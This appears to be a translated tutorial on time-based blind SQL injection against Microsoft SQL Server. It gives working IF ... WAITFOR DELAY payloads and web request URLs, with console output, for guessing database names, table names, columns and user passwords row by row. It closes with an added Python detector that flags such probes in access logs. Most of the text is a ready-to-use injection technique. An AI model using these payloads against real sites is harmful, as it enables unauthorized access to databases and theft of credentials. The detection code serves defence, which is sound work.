0x01 Introduction

Time-based injection in SQL Server is rather awkward: the delay code must be placed at the very end of the SQL statement.

This means the injection point must allow closing the existing statement, and then using -- to comment out whatever useless code follows.

If there is no way to guarantee that waitfor delay '0:0:5' sits at the end of the SQL, this method cannot be used.

0x02 Test data

  1> select * from article;
  2> go
  +----+-----------+-----------+
  | id | title | content |
  +----+-----------+-----------+
  | 1 | 测试标题 | 测试内容 |
  | 2 | 测试标题2 | 测试内容2 |
  +----+-----------+-----------+
  (2 rows affected)

  # Test table data: users;
  sql server> select * from users;
  +----+--------------+----------+
  | id | username | password |
  +----+--------------+----------+
  | 1 | test-user-01 | 123456 |
  | 2 | test-user-02 | 234567 |
  +----+--------------+----------+
  2 rows in set (0.00 sec)

  sql server> SELECT system_user;
  +-----------------------+
  | field1 |
  +-----------------------+
  | sa |
  +-----------------------+
  1 row in set (0.00 sec)

  sql server> select db_name();
  +-----------------------+
  | field1 |
  +-----------------------+
  | test |
  +-----------------------+
  1 row in set (0.00 sec)

0x03 Guessing the database name

Note: changing the number in db_name(1) shows the names of other databases.
For example:
db_name() is the currently connected database
db_name(1) gives database 1
db_name(2) gives database 2

Web request: http://www.test.com/sql.php?id=1' IF(db_name() like '%test%') waitfor delay '0:0:5' -- a

Database statement: select * from article WHERE id='1' IF(db_name() like '%test%') waitfor delay '0:0:5' -- a';

  # Get data for the currently connected database
  # Correct guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (5.064 sec)
  # Wrong guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (0.04 sec)

0x04 Guessing table names

Note:
the table_name inside OVER(Order by table_name) must be changed to a column that exists in the information_schema.tables table

To query a different database:
for example:
table_catalog=db_name() (queries the current database)
table_catalog='name of the database to query'

To query a different table:
for example:
change to row_number>=1
change to row_number>=2

Web request: http://www.test.com/sql.php?id=1' IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like '%article%') waitfor delay '0:0:5' -- a

Database statement: select * from article WHERE id='1' IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like '%article%') waitfor delay '0:0:5' -- a';

  # Get table 1 of the current database
  # Correct guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  table_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  table_name
  FROM
  information_schema.tables
  WHERE
  table_catalog = db_name()
  ) AS a
  WHERE
  row_number = 1
  ) LIKE '%article%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (5.03 sec)
  # Wrong guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  table_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  table_name
  FROM
  information_schema.tables
  WHERE
  table_catalog = db_name()
  ) AS a
  WHERE
  row_number = 1
  ) LIKE '%bbbb%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (0.05 sec)

  # Get table 2 of the current database
  # Correct guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  table_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  table_name
  FROM
  information_schema.tables
  WHERE
  table_catalog = db_name()
  ) AS a
  WHERE
  row_number = 2
  ) LIKE '%users%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (5.05 sec)
  # Wrong guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  table_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  table_name
  FROM
  information_schema.tables
  WHERE
  table_catalog = db_name()
  ) AS a
  WHERE
  row_number = 2
  ) LIKE '%aaaaaaa%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (0.03 sec)

0x05 Guessing columns

Note:
the column_name inside OVER(Order by column_name) must be changed to a column that exists in the information_schema.columns table

To query a different table:
for example:
table_name='name of the table to query'

To query a different column:
for example:
change to row_number>=1
change to row_number>=2

Web request: http://www.test.com/sql.php?id=1' IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1) like '%id%') waitfor delay '0:0:5' -- a

Database statement: select * from article WHERE id='1' IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1) like '%id%') waitfor delay '0:0:5' -- a';

  # Column list of the users table in the current database
  1> SELECT
  *
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  column_name
  FROM
  information_schema.columns
  WHERE
  table_catalog = db_name()
  AND table_name = 'users'
  ) AS a;
  2> go
  +-------------+-------------+
  | row_number | column_name |
  +-------------+-------------+
  | 1 | id |
  | 2 | password |
  | 3 | username |
  +-------------+-------------+
  (3 rows affected)

  # Get the first column of the users table in the current database
  # Correct guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  column_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  column_name
  FROM
  information_schema.columns
  WHERE
  table_catalog = db_name()
  AND table_name = 'users'
  ) AS a
  WHERE
  row_number = 1
  ) LIKE '%id%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (5.077 sec)
  # Wrong guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  column_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  column_name
  FROM
  information_schema.columns
  WHERE
  table_catalog = db_name()
  AND table_name = 'users'
  ) AS a
  WHERE
  row_number = 1
  ) LIKE '%aaaaaaaaa%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (0.003 sec)

  # Get the second column of the users table in the current database
  # Correct guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  column_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  column_name
  FROM
  information_schema.columns
  WHERE
  table_catalog = db_name()
  AND table_name = 'users'
  ) AS a
  WHERE
  row_number = 2
  ) LIKE '%password%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (5.05 sec)
  # Wrong guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  column_name
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  column_name
  FROM
  information_schema.columns
  WHERE
  table_catalog = db_name()
  AND table_name = 'users'
  ) AS a
  WHERE
  row_number = 2
  ) LIKE '%savasv%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (0.03 sec)

0x06 Guessing contents

Note:
the username inside OVER(Order by username) must be changed to a column that exists in the users table

To get the data of a different column, change the a.username in the web request
for example
the users table's columns are: id, username, password
because I used an alias, to get other data you can change it to
a.id, a.username, a.password

To query a different row:
for example:
change to row_number>=1
change to row_number>=2

Web request: http://www.test.com/sql.php?id=1' IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1) like '%test-user-01%') waitfor delay '0:0:5' -- a

Database statement: select * from article WHERE id='1' IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1) like '%test-user-01%') waitfor delay '0:0:5' -- a';

  # Query the first row of the users table, username column
  # Correct guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  a.username
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  FROM
  users
  ) AS a
  WHERE
  row_number = 1
  ) LIKE '%test-user-01%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (5.07 sec)
  # Wrong guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  a.username
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  FROM
  users
  ) AS a
  WHERE
  row_number = 1
  ) LIKE '%aaaaaa%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (0.07 sec)

  # Query the second row of the users table, password column
  # Correct guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  a.password
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  FROM
  users
  ) AS a
  WHERE
  row_number = 2
  ) LIKE '%234567%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (5.06 sec)
  # Wrong guess
  1> SELECT
  *
  FROM
  article
  WHERE
  id = '1'
  IF (
  (
  SELECT
  a.password
  FROM
  (
  SELECT
  ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  FROM
  users
  ) AS a
  WHERE
  row_number = 2
  ) LIKE '%aascacascsac%'
  ) WAITFOR delay '0:0:5' -- a';
  2> go
  +----+----------+----------+
  | id | title | content |
  +----+----------+----------+
  | 1 | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected) (0.06 sec)
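Seen from the defending side, every probe in 0x03 through 0x06 has the same shape in the web server's access log: a closed quote followed by IF(, a WAITFOR DELAY, a trailing -- comment, and, for the later steps, ROW_NUMBER() OVER paging over information_schema. The following Python is an added example (not code from the original post) that decodes each request's query string, flags those building blocks, and compares the requested delay with the measured response time, so a true-branch probe (the 5-second responses in the listings) is told apart from a false one. The log format, client addresses and timings are constructed; the payloads are the ones from this page, URL-encoded.

```python
"""Added example: detect SQL Server time-based blind probes in access logs."""
import re
from urllib.parse import unquote_plus

# Constructed access log: "<client-ip> <method> <path?query> <status> <seconds>"
SAMPLE_LOG = """\
10.0.0.5 GET /sql.php?id=1 200 0.041
10.0.0.9 GET /sql.php?id=1%27+IF(db_name()+like+%27%25test%25%27)+waitfor+delay+%270:0:5%27+--+a 200 5.064
10.0.0.9 GET /sql.php?id=1%27+IF(db_name()+like+%27%25aaaa%25%27)+waitfor+delay+%270:0:5%27+--+a 200 0.040
10.0.0.9 GET /sql.php?id=1%27+IF((select+table_name+from+(select+ROW_NUMBER()+OVER(Order+by+table_name)+AS+row_number,table_name+FROM+information_schema.tables+where+table_catalog=db_name())+as+a+where+row_number=1)+like+%27%25article%25%27)+waitfor+delay+%270:0:5%27+--+a 200 5.030
10.0.0.7 GET /sql.php?id=2 200 0.038
"""

DELAY_RE = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.I)
# Building blocks of the probes in 0x03-0x06, matched on the decoded query string.
MARKERS = {
    "stacked-if": re.compile(r"'\s*if\s*\(", re.I),
    "comment-tail": re.compile(r"--\s*\w*\s*$"),
    "row_number": re.compile(r"row_number\s*\(\s*\)\s*over\s*\(", re.I),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "db_name": re.compile(r"db_name\s*\(", re.I),
}

def requested_delay_seconds(query):
    """Seconds the payload asked the server to sleep, or None if no WAITFOR."""
    m = DELAY_RE.search(query)
    if not m:
        return None
    h, mnt, s = (int(x) for x in m.groups())
    return h * 3600 + mnt * 60 + s

def analyse_line(line):
    """Finding dict for a suspicious request, None for a clean one."""
    ip, _method, target, _status, secs = line.split()
    query = unquote_plus(target.partition("?")[2])
    hits = [name for name, rx in MARKERS.items() if rx.search(query)]
    delay = requested_delay_seconds(query)
    if delay is None and not hits:
        return None
    elapsed = float(secs)
    if delay is None:
        verdict = "suspicious"
    else:  # the server sleeps for the full delay only when the injected IF held
        verdict = "probe-true" if elapsed >= delay else "probe-false"
    return {"ip": ip, "delay": delay, "elapsed": elapsed, "markers": hits, "verdict": verdict}

def scan(log_text):
    """All findings for a whole log, in file order."""
    return [f for f in map(analyse_line, log_text.splitlines()) if f]
```

Running scan(SAMPLE_LOG) yields three findings from 10.0.0.9, two of them probe-true; a burst of such pairs from one client is the signal to alert on, and the "verdict" field records which guesses the attacker learned were correct.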